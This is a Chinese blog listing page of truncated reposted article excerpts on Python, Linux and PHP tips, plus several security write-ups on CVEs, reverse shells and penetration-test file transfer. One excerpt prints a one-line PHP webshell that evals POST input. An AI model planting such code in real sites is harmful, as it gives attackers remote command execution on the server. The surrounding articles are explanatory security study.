自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

转载 python3 多维数组 NumPy ndarray 简介

目录 基础 重要属性 创建 Converting Python array_like Objects to NumPy Arrays 多维数组 一维 通用数学函数 基础 NumPy 的主要对象是齐次多维数组。它是一个元素表(通常是元素是数字),其中所有元素类型都相同,元素以正...

2020-07-06 11:16:52 1 0

转载 python3 字符串 转 ascii码

在这里先解释一下ASCII,Unicode 和 UTF-8这三者的关系 最早出现的是ASCII,一共包含128个字符(一个字节可以表示256种状态,但第一位所有默认为0,所以只有128种)。在接下来计算机的发展过程中,128种远远不能满足增加的需求(各种国家语言等),所以引入了Unicode,但...

2020-07-06 11:06:29 2 0

转载 python3 字符串转数组 数组转字符串 切片操作

1.数组转字符串 #方法1 arr = ['a','b'] str1 = ''.join(arr) #方法2 arr = [1,2,3] #str = ''.join(str(i) for i in arr) #...

2020-07-06 11:04:11 1 0

转载 spring-data-rest-rec 复现分析 cve-2017-8046

漏洞信息 pivotal发布的漏洞信息如下: Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON d...

2020-07-06 10:53:56 4 0

转载 linux 错误 ttyname failed: Inappropriate ioctl for device 解决方法

在我使用git push、hexo deploy等类似操作时,时常会看到ttyname failed: Inappropriate ioctl for device的报错信息。这怎么能行,不是0 errors,0 warnings能行?这里就来记录一下这个问题的解决办法。 问题原因 Ubu...

2020-07-06 10:49:41 2 0

转载 python3 获取 函数参数个数 和 默认参数

实例如下: def sum(a,b): return(a+b) print(sum.__code__.co_argcount) # 2 #输出的函数参数个数 print(sum.__code__.co_varnames) # ('a', 'b')...

2020-07-06 10:48:00 11 0

转载 python3 函数签名简介 验证函数参数

一个函数或方法,它使用*args和**kwargs作为参数,这样使得它比较通用, 但有时候你想检查传递进来的参数是不是某个你想要的类型。可以使用函数签名来做验证 函数签名对象,表示调用函数的方式,即定义了函数的输入和输出。 在Python中,可以使用标准库inspect的一些方法或类,来操作或...

2020-07-06 10:45:58 2 0

转载 python3 乱序函数 shuffle 简介

解释说明: shuffle()函数是打乱序列里面的元素,并随机排列的。 使用说明: import random random.shuffle (alist ) 注意下:alist可以使是一个列表,也可以是个序列。shuffle()是不能直接访问的,需要导入random模块 具体例子...

2020-07-06 10:36:23 2 0

转载 python3 生成随机数、随机字符串

import random import string # 随机整数: print(random.randint(1,50)) # 输出结果: # 3 # 随机选取0到100间的偶数: print(random.randrange(0, 101, 2)) # 输出结果: # 68 # ...

2020-07-06 10:27:15 10 0

转载 linux 查看 定时任务 crontab 日志记录

在Unix和类Unix的操作系统之中,crontab命令常用于设置周期性被执行的指令,也可以理解为设置定时任务。 crontab中的定时任务有时候没有成功执行,什么原因呢?这时就需要去日志里去分析一下了,那该如何查看crontab的日志记录呢? 1. linux 看 /var/log/cro...

2020-07-03 17:05:47 23 0

转载 java Runtime.getRuntime().exec 获取反弹shell

说明 前面写了一篇在Java环境下获取shell的文章。当时使用的语句是: 1 2 3 Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash&quo...

2020-07-03 09:17:05 39 0

转载 php file_put_contents() 与 file_get_contents() 函数用法

file_put_contents file_put_contents() 函数用于把字符串写入文件,成功返回写入到文件内数据的字节数,失败则返回 FALSE。 语法: int file_put_contents ( string filename, string data [, int fla...

2020-07-03 09:05:49 21 0

转载 谷歌浏览器 chrome 查看当前页面cookie

方法一: 首先,开启浏览器,输入要查看网址,再点网址列前方的图示,就可以就会看到Cookie。 其次,点一下上图中显示的数字,进入后在允许的页面中,就会看到目前所储存的Cooke值有哪些。 最后,当你要查看某个具体的cookie值,找到网址点一下,就可看到每个Cookie所记录的值与内容啦! ...

2020-07-03 09:02:15 37 0

转载 js base64编码解码 btoa atob 函数简介

window.atob(string):解码 用来解码一个已经被base-64编码过的字符串。(参数string: 必需是一个通过 btoa() 方法编码的字符串) window.btoa(string):编码 用来创建一个 base-64编码的字符串。 示例: //编码示例 window...

2020-07-02 20:33:15 21 0

转载 python3报错处理:UnicodeEncodeError: ‘ascii‘ codec can‘t encode characters in position 0-1

一、背景说明 最开始不愿意使用Python,一大原因是因为Python2默认使用ASCII编码处理中文可以说是一件痛苦的事情。仅从更换默认编码一项变换,就可以说Python3和Python2不算同一门语言。 Python3更换为默认使用Unicode(utf-8)编码,一直使用下来再没有遇到编...

2020-07-02 16:04:26 51 0

转载 python时间差中 seconds 和 total_seconds 区别

import datetime t1 = datetime.datetime.strptime("2017-9-06 10:30:00", "%Y-%m-%d %H:%M:%S") t2 = datetime.datetime.strptime(&quo...

2020-07-02 15:18:16 26 0

转载 java getRuntime().exec 带符号的命令 无法执行 解决方法

0x01 前言 首先Java下的命令执行大家都知道常见的两种方式: 1.使用ProcessBuilder 1 2 ProcessBuilder pb=new ProcessBuilder(cmd); pb.start(); 2.使用Runt...

2020-07-02 13:31:36 37 0

转载 渗透测试中的文件传输技巧

目录 搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP server Windows Linux Setup HTTP PUT server ...

2020-07-02 13:02:46 34 0

转载 spring security oauth rce (cve-2016-4977) 漏洞分析

背景描述 Spring Security OAuth 2016年以前有出一个CVE,这里写一个记录学习的东西。 漏洞详细 Spring Security OAuth官网有CVE-2016-4977的介绍,但是讲的不怎么清楚,就只是说了一下漏洞原理,我们就只知道是因为执行一个SpEL表达式https...

2020-07-02 12:35:02 29 0

转载 ecshop 2.x/3.x sql注入/任意代码执行漏洞

影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数e...

2020-07-01 22:17:10 43 0

转载 php 一句话木马简介

一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门...

2020-07-01 19:32:24 46 0

转载 linux apt-get install 安装指定的版本

命令用法如下: apt-get install package=version 例如我要安装autoconf 2.50: apt-get install autoconf=2.50 列出一个软件的版本的命令是 apt-cache madison soft_name

2020-07-01 15:29:30 34 0

转载 java rmi反序列化漏洞 简介

目录 一、RMI简介 二、RMI示例 三、漏洞复现 四、漏洞分析 1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明? 2、为什么不直接将badAttributeValueExpException对象bind到RMI服务? ...

2020-07-01 14:09:52 29 0

转载 java 反序列化漏洞简介

目录 一、Java的序列化与反序列化 二、对java序列化的理解 三、反序列化的漏洞原理概述 四、关于反射链 一、Java的序列化与反序列化 在这里我们直接自己定义一个类,然后对这个类的对象(一个实例)进行序列化和发序列化测试。 //引入必要的java包文件 import ja...

2020-07-01 14:01:40 48 0

转载 java 序列化与反序列化

一、什么是序列化与反序列化? Java 序列化是指把 Java 对象转换为字节序列的过程; Java 反序列化是指把字节序列恢复为 Java 对象的过程; 二、为什么要用序列化与反序列化? 在为什么要用序列化与反序列化之前我们先了解一下对象序列化的两种用途: 把对象的字节序列永久地保存...

2020-07-01 10:12:28 24 0

转载 linux ssh 连接超时中断 解决方法

当在终端使用ssh命令连接到服务器时,如果一段时间没有活动连接会被中断 一、修改ssh客户端配置 编辑客户端 /etc/ssh/ssh_config (或~/.ssh/config 对当前用户生效) 文件,修改以下两个配置项(没有就自己添加) ServerAliveInterval 60 #...

2020-06-30 21:32:23 39 0

转载 python3 使用psutil 查看内存占用

有的时候需要对python程序内存占用进行监控,这个时候可以用到psutil库,Anaconda中是自带的,如果import出错,可以用pip install psutil(安装在python中)或conda install psutil(安装在Anaconda中) #常用的: import ...

2020-06-29 20:10:24 58 0

转载 linux 内存管理中的 rss 和 vsz

RSS 是常驻内存集(Resident Set Size),表示该进程分配的内存大小。 RSS 不包括进入交换分区的内存。 RSS 包括共享库占用的内存(只要共享库在内存中) RSS 包括所有分配的栈内存和堆内存。 VSZ 表示进程分配的虚拟内存。 VSZ 包括进程可以访问的所有内存,包...

2020-06-29 20:04:19 40 0

转载 python3 监控指定进程 cpu和内存 使用率

为了测试某个服务的稳定性,通常需要在服务长时间运行的情况下,监控其资源消耗情况,比如cpu和内存使用 这里借助python的psutil这个包可以很方便的监控指定进程号(PID)的cpu和内存使用情况 代码 process_monitor.py import sys import tim...

2020-06-29 19:48:31 56 0

转载 python3 整除 取模

一 除法 1 正数除法 Python3中的除法中,除法/总是返回一个浮点数,如下: >>> 6/4 1.5 >>> 2/3 0.6666666666666666 如果只想得到整数的结果,丢弃分数部分,可以使用运算符//: >>> ...

2020-06-29 19:11:52 38 0

转载 tomcat 启动报栈溢出 解决方法

问题缘由: 在tomcat下部署war包启动时报错,关键错误信息如下: Caused by: java.lang.IllegalStateException: Unable to complete the scan for annotations for web application [] d...

2020-06-29 17:05:16 38 0

转载 python3 filter 列表元素过滤(匹配)用法

如果你希望得到一个列表中以**.yml**结尾的元素,通过特定的条件筛选列表中的元素,但又不想写for循环,因为那样会让你的代码不够简洁,那么可以尝试这样: 列表中的字符串的过滤 files= ['xxxx_server', 'xxxx_server.yml&#...

2020-06-29 10:07:47 144 0

转载 python3 获取文件夹中的文件列表

问题 获取文件系统中某个目录下的所有文件列表。 解决方案 使用 os.listdir() 函数来获取某个目录中的文件列表,比如: import os file_name = os.listdir('/Users/xz/test') print(file_name) ...

2020-06-29 10:06:02 47 0

转载 php serialize unserialize 数据序列化 与 反序列化

序列化就是将一个对象的状态(各个属性量)保存起来,然后在适当的时候再获得。 用一个类的时候都是new一下! 如果serialize将数据序列化以后存到数据库中等 用的时候就不再new了 反序列化以后就可以直接用了!相当于new了一下! 用例子给你说明一下! 如: serialize 实例 ...

2020-06-27 19:52:41 23 0

转载 python3 实现 php serialize 函数

phpserialize ,是一个PHP 的变量序列化和反序列化函数在 Python 的实现。换言之,就是在 Python 语言环境中,借助 phpserialize 可以方便的处理那些在 PHP 中序列化了的文本,将其转变为变量(字符串、数组、整数、对象等),也可以将变量按照 PHP 语言的序列...

2020-06-27 19:48:59 36 0

转载 python3 实现 php bin2hex 函数

bin2hex 二进制转换为十六进制 php版 <?php $str = "Shanghai"; echo bin2hex($str); ?> 输出结果: 5368616e67686169 python版 import binasci...

2020-06-27 19:42:41 25 0

转载 php 换行 \n \r\n br 简介

示例1: <?php echo'hello</br>'; echo'world!'; ?> 输出: helllo world! 示例2: <?php //unix系统使用\n;window...

2020-06-27 19:39:28 39 0

转载 php 执行系统命令函数

目录 命令注入 system()函数 passthru()函数 exec() shell_exec()函数 反引号 ` popen()函数 pcntl_exec()函数 命令注入 命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可...

2020-06-27 18:05:14 38 0

转载 webmin远程命令执行漏洞(cve-2019-15107)深入分析

漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开...

2020-06-27 08:24:11 76 0

转载 python supervisord 远程命令执行漏洞(CVE-2017-11610)

Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前...

2020-06-27 07:36:47 44 0

提示
确定要删除当前文章?
取消 删除